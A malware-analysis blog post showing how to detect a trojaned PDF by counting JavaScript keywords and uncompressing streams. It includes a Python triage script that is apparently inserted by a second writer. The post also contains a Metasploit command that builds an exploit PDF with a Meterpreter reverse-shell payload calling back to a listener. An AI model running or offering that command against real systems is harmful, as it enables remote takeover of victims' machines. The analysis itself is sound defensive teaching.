Analyzing a PDF That Contains a Trojan

Introduction :

On this occasion I will write up the stages I use to analyze a document file with the *.PDF extension in order to determine whether it is malicious or not.
This happened some time ago when I tried to download a study guide book and the file was flagged by the anti-virus I use. That raised strong suspicion, so I analyzed the file, and my guess was right: the document contained JavaScript, and that script turned out to be a payload wrapped into the document. These are some of the steps I took to analyze it.

I will compare a clean PDF document with a document containing a trojan.

Equipment :
1. pdfid
2. pdf-parser
3. pdftk (apt-get install pdftk)
4. strings

In the first stage I will analyze the document "analysis.pdf", which is not infected by a trojan.


OK, now let's go!
Test a pdf file:

# pdfid analysis.pdf


In the output we only need to pay attention to the JS / JavaScript lines, and the output above shows that the document is free of an inserted trojan: the value shown on the JS / JavaScript lines is "0".

So it means we do not need to analyze it further :)

Then let's try to analyze a document containing a trojan; here I use metasploit to wrap the trojan into a pdf:

# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E



Next, try to download the file.


The PDF version metasploit uses to wrap the trojan into the document is 1.5, as shown in the image above.

OK, then test the file:
# pdfid trojanPDF.pdf


Here the value shown on the JS / JavaScript line is "1", meaning the pdf file contains a JavaScript command, so let's look further.

Next, use "strings" to show the JavaScript lines:
# strings trojanPDF.pdf


I only showed part of the output, and no JavaScript appears in the form of readable text; this may be metasploit's attempt to encode the JavaScript into a form that is harder to read. Hmm, I like metasploit :)

Next, parse the PDF document:
# pdf-parser -f trojanPDF.pdf

-f = pass stream objects through their filters


Above we still do not see the JavaScript text; metasploit's encoding is very good :)

So here I will create a duplicate of the document with all of the encoding removed: uncompress "trojanPDF.pdf" and write the result to the new document "trojanPDF-2.pdf":

# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress


Next, use "strings" again to display the printable text of the *.pdf document:
# strings trojanPDF-2.pdf


Yuhuu, now we find the JavaScript text in it, as shown in the picture above.
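To make the two checks above concrete, here is an added Python example (my own code, not the author's and not pdfid or pdftk) that does both stages in one script: it counts pdfid-style keywords in the raw bytes, then inflates every FlateDecode stream and looks for script text in the inflated contents. It constructs a small benign sample PDF whose JavaScript body sits inside a compressed stream, so the raw `strings`-style view shows the /JS keyword but no script text, while the inflated view shows the script, which is exactly the difference between the trojanPDF.pdf and trojanPDF-2.pdf steps. Assumptions of the example: streams carry a direct /Length value, the list of script markers is my own, and the sample PDF is constructed here rather than being a metasploit output.

```python
import re
import zlib

# Keywords pdfid reports on; a non-zero /JS or /JavaScript count is what
# triggered the closer look in the post above.
KEYWORDS = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/Launch",
            b"/EmbeddedFile", b"/ObjStm", b"/FlateDecode"]

# Fragments of Acrobat JavaScript worth flagging once stream bodies are
# readable (an analyst's list; an assumption of this example).
SCRIPT_MARKERS = [b"app.", b"eval(", b"unescape(", b"String.fromCharCode",
                  b"util.printf", b"this.getAnnots"]

# An object dictionary directly followed by a stream; the tempered dot keeps
# the match from running across an earlier object's "endobj".
STREAM_RE = re.compile(rb"obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n", re.S)


def count_keywords(pdf):
    """pdfid-style count of each keyword in the raw (not inflated) bytes."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", pdf))
            for k in KEYWORDS}


def inflate_streams(pdf):
    """Return (dictionary, inflated bytes) for every /FlateDecode stream.
    Assumes a direct /Length value; indirect lengths are not resolved."""
    found = []
    for m in STREAM_RE.finditer(pdf):
        dictionary = m.group(1)
        if b"/FlateDecode" not in dictionary:
            continue
        start = m.end()
        length = re.search(rb"/Length\s+(\d+)", dictionary)
        if length:
            raw = pdf[start:start + int(length.group(1))]
        else:  # fall back to the endstream marker
            raw = pdf[start:pdf.find(b"endstream", start)].rstrip(b"\r\n")
        try:
            found.append((dictionary, zlib.decompress(raw)))
        except zlib.error:
            found.append((dictionary, b""))  # corrupt or truncated stream
    return found


def printable_strings(data, min_len=4):
    """Rough equivalent of `strings`: runs of printable ASCII."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_script_markers(pdf, inflate=True):
    """Script markers visible in the raw bytes, or also after inflating streams."""
    haystack = pdf
    if inflate:
        haystack = pdf + b"\n".join(data for _, data in inflate_streams(pdf))
    return sorted(m.decode() for m in SCRIPT_MARKERS if m in haystack)


def triage(pdf):
    """Same verdict rule as the post: any /JS or /JavaScript, or script text
    visible after inflation, means 'look further'."""
    counts = count_keywords(pdf)
    raw_hits = find_script_markers(pdf, inflate=False)
    inflated_hits = find_script_markers(pdf, inflate=True)
    suspicious = counts["/JS"] + counts["/JavaScript"] > 0 or bool(inflated_hits)
    return {"counts": counts, "raw_hits": raw_hits,
            "inflated_hits": inflated_hits, "suspicious": suspicious}


def build_sample_pdf(compress_script=True):
    """Constructed, benign sample (not a metasploit file): an /OpenAction that
    runs JavaScript whose body is object 5. With compress_script=True the body
    is a FlateDecode stream, which is what hides it from `strings`."""
    script = b"app.alert('constructed sample - benign');"
    if compress_script:
        data = zlib.compress(script)
        obj5 = (b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(data)
                + data + b"\nendstream")
    else:
        obj5 = b"<< /Length %d >>\nstream\n" % len(script) + script + b"\nendstream"
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        obj5,
    ]
    out, offsets = b"%PDF-1.5\n", []
    for num, body in enumerate(objects, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objects) + 1, xref_at))
    return out


if __name__ == "__main__":
    sample = build_sample_pdf()
    report = triage(sample)
    print("pdfid-style counts :", report["counts"])
    print("markers, raw bytes :", report["raw_hits"])
    print("markers, inflated  :", report["inflated_hits"])
    for _, body in inflate_streams(sample):
        print("inflated strings   :", printable_strings(body))
```

Run it as-is to see the two views side by side; to triage a real file, read its bytes and pass them to `triage()`. The keyword counts come from the raw bytes, just as pdfid reads them, so a compressed script body does not lower the /JS count; only the script text itself needs the inflation step, which is the role pdftk's uncompress played above.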

I think I need to download other guide books that are not infected with a trojan :)

Regards
Hidemichi-Hiroyuki a.k.a [H2]
